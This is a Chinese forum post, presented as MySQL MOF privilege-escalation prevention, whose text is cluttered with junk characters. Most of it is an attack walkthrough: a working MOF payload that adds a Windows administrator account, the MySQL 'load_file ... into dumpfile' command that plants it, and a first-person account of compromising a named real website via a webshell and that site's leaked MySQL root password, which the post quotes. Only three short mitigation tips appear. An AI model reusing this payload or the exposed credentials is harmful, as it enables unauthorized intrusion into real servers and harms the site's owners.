Mysql mof扩展漏洞防范方法
) }9 X% `' X0 n/ a# \0 M* S% X' B3 _. s9 ?# O4 v6 m& Z, G
网上公开的一些利用代码:
; w9 w5 ]: i% u4 L4 S3 c2 o
( K2 h9 `* A k% E" D#pragma namespace(“\\\\.\\root\\subscription”)& q( Z6 E4 I4 n( Y u, x4 U
2 q5 H1 t! P. v) a
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
9 b, ?: l- Z6 B# N: Q$ w7 C' _/ Y/ I/ z% `9 \9 q, A3 B
0 K9 f# ], G- P5 h3 {6 t; ]
. L6 }4 d- l" O; C% F 5 M! z$ _0 }1 G% e& s: A
( ]/ I, x2 E: b
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;: [6 @: f6 I# s; y. B
从上面代码来看得出解决办法:
1 p/ p! V, O9 n. ?+ a/ X% r- y) Y5 ?; R c, d
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
6 ~, p* T* u4 S ]% c/ d4 l- |; g7 [9 h& d; L' Q4 C
2、禁止使用”WScript.Shel”组件- s8 J7 w1 V0 M5 T
. u9 L( B0 i Q: j+ T, R( b
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
3 F2 W, x& ]% ]9 h* T
. V* k3 e/ ^0 {1 X& y1 W当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下# I- b. d0 S @8 F+ k/ M
7 _6 m; u& I9 Z事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权1 Q2 a2 R9 W5 n$ i
( X! E% X; E8 O: z+ Q) N, b, i1 n% i
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
c2 P1 @ {+ K1 K# a% ^6 A7 q' J( z% E$ D" Z9 O, }4 K: k5 S6 Y( T
看懂了后就开始练手吧5 {: \! |0 L1 q5 S3 w& O- ^, ?
+ ], j$ q+ d5 s/ X: yhttp://www.webbmw.com/config/config_ucenter.php 一句话 a( F4 O" s7 ^/ e: N3 v
1 p' R' C4 t7 ?: S$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。# q# K; L0 _0 [; G! q
$ s% ]" F8 B1 J8 q于是直接用菜刀开搞+ |* Q- \7 P+ m5 t4 m; V
- ?4 Z1 i( P9 e& `# U上马先* S3 V, B2 J, t0 X5 S4 `
% U* z3 p" W7 D. \
既然有了那些账号 之类的 于是我们就执行吧…….
. `: P `4 p: t, w' h
$ M1 u7 ^3 R. k小小的说下 \. f1 X7 A& C; U9 b h
# O) K$ {8 H- j( ~$ e. R. y: i7 @在这里第1次执行未成功 原因未知
. V9 J2 F2 `7 h9 Q! C8 ]$ H& j' _/ o$ Y4 q# b q. X
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。/ W/ M; q' P' @+ h. r
; U& [* @. E$ g/ O% j#pragma namespace(“\\\\.\\root\\subscription”)8 p8 O8 ]1 ^$ i( s
" r2 a1 W: k) Y- ?% ^; K1 E$ \& M4 Y
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };2 j. q h8 \ o! \' K; |/ \
( o# m! j7 C1 c/ a% R! u8 g1 C! v O
我是将文件放到C:\WINDOWS\temp\1.mof$ I* ?) _, _/ Y6 x2 ]2 A
0 Z" s @" k$ }5 C, j0 C所以我们就改下执行的代码! u: I2 u F1 x I' n: `, s
! E8 R) |+ H( U* r0 Oselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;/ ^0 o' j* |7 r! b! Q% B
- N9 O% o6 ?* j5 _6 J b; x! E& U
0 h' [, _4 Q, _2 ?7 m8 m; h2 b8 C9 o. w3 N `' `8 P3 L" X
但是 你会发现账号还是没有躺在那里。。- J) W4 Q, G# c" t
2 d: h) a5 Q8 A/ R. y/ t
于是我就感觉蛋疼 Q* ?* [6 H/ a4 W; ~8 \
6 \+ |+ ^$ u$ Y8 q3 i6 s" H就去一个一个去执行 但是执行到第2个 mysql时就成功了………# P3 r- U; k- I4 h
3 R0 w& b- e: o& i9 f( S9 g& Q
; y, v6 ^1 x: k$ e* a% l
3 U1 Q. }$ q. O
但是其他库均不成功…. ]2 i! W& L1 w( p2 H
7 q: w/ O$ s* a; ]9 q) D- ?我就很费解呀 到底为什么不成功求大牛解答…
5 v( O% ~2 |, O9 G+ e6 J4 z2 z# P" Q; n) y/ |7 Y9 n' Z
5 } t: Y* }; a+ ^8 o J) e. J# |0 @$ v* ~* U, k
|
发表于 2013-1-4 19:49:49
收藏
支持
反对